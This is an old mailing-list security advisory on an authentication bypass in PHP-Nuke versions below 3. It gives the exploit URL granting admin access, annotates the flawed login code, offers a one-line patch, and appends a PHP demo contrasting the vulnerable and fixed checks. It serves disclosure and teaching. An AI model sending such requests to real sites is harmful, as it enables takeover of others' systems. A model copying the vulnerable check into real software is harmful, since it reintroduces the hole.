Subject: Vuln. in all sites using PHP-Nuke, versions less than 3
From: Elbruj0, Gandalf (bruj0 SECURITYPORTAL.COM.AR)
Date: Mon Aug 21 2000 - 14:23:40 CDT
Greetings,
PHP-Nuke is a web portal system: storytelling software and an automated
web site for distributing news and articles, with a user system.
Exploit:
-------
The problem is that anyone who requests
http://example.com/admin.php3?admin=whatever
gets full access as an admin, meaning they can post news and do everything
the real administrator can do.
Description:
-----------
So let's see why this is possible. The file auth.inc.php3, which is used to
authenticate the admin:
<---snip--->
if(isset($admin)) {
    if(!IsSet($mainfile)) { include("mainfile.php3"); }
    $admin = base64_decode($admin);
    $admin = explode(":", $admin);   // between this line and the one above, $admin becomes null
    $aid = "$admin[0]";              // so $aid ...
    $pwd = "$admin[1]";              // ... and $pwd are also null
<---snip--->
    $result=mysql_query("select pwd from authors where aid='$aid'");
    // ^^^ this becomes: select pwd from authors where aid=''; which returns nothing
<---snip--->
} else {
    list($pass)=mysql_fetch_row($result);   // $pass gets null here
    if($pass == $pwd) {                     // so this translates to NULL == NULL
        $admintest = 1;                     // bingo! we're admin now!
    }
<---snip--->
Fix:
---
Now for the fix that I mailed to the author, and he then added to the latest version that came out days ago. <rant>btw, he didn't even bother to mention who discovered it, AND just said HE found it AND fixed it.</rant>

For those that don't want to download the latest version, at http://www.ncc.org.ve/php-nuke.php3, here's a quick fix: in file auth.inc.php3, at line 37, add:

    if($aid=="" || $pwd=="") exit;

That's all, have fun.

---------------------------------------------
Webmaster of http://www.securityportal.com.ar
bruj0 phreaker.net
 /"\
 \ /   ASCII Ribbon Campaign
  X    Against HTML Mail
 / \
Proud member of http://www.undersec.com
---------------------------------------------
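An added example, not PHP-Nuke's own code: the auth.inc.php3 check described above and the advisory's fix side by side, written for modern PHP with an in-memory array standing in for the MySQL authors table. The array contents, the fetch_pwd/admintest_* helper names and the use of return values instead of exit are constructed assumptions.

```php
<?php
// Added example (not PHP-Nuke's own code): the auth.inc.php3 check from the
// advisory, modelled on modern PHP with an in-memory array in place of the
// MySQL "authors" table. Table contents and helper names are constructed here.

$authors = ['admin' => 's3cret'];   // constructed: aid => pwd

// Stand-in for mysql_query("select pwd from authors where aid='$aid'") plus
// mysql_fetch_row(): with no matching row, the original list($pass) assignment
// leaves $pass null, which is what this helper returns.
function fetch_pwd(array $authors, string $aid): ?string {
    return $authors[$aid] ?? null;
}

// The original logic: decode, split on ":", look the author up, loose-compare.
function admintest_vulnerable(array $authors, string $admin): bool {
    $parts = explode(":", (string) base64_decode($admin));
    $aid = $parts[0];
    $pwd = $parts[1] ?? '';               // "$admin[1]" on a one-element array -> ""
    $pass = fetch_pwd($authors, $aid);    // unknown aid -> no row -> null
    return $pass == $pwd;                 // null == "" is true: admin without a password
}

// The advisory's fix: refuse an empty $aid or $pwd before the lookup. Returning
// false stands in for the advisory's exit; the strict comparison is an added
// hardening so type-juggled values cannot match either.
function admintest_fixed(array $authors, string $admin): bool {
    $parts = explode(":", (string) base64_decode($admin));
    $aid = $parts[0];
    $pwd = $parts[1] ?? '';
    if ($aid == "" || $pwd == "") {
        return false;
    }
    $pass = fetch_pwd($authors, $aid);
    return $pass !== null && $pass === $pwd;
}

$legit  = base64_encode("admin:s3cret");   // what a real login produces
$forged = "whatever";                       // the value from the advisory's URL

var_dump(admintest_vulnerable($authors, $legit));
var_dump(admintest_vulnerable($authors, $forged));
var_dump(admintest_fixed($authors, $legit));
var_dump(admintest_fixed($authors, $forged));
```

The decoded forged value contains no ":", so the password half is empty and the author lookup finds no row; the vulnerable check then accepts it while the fixed check rejects it, and the legitimate value passes both.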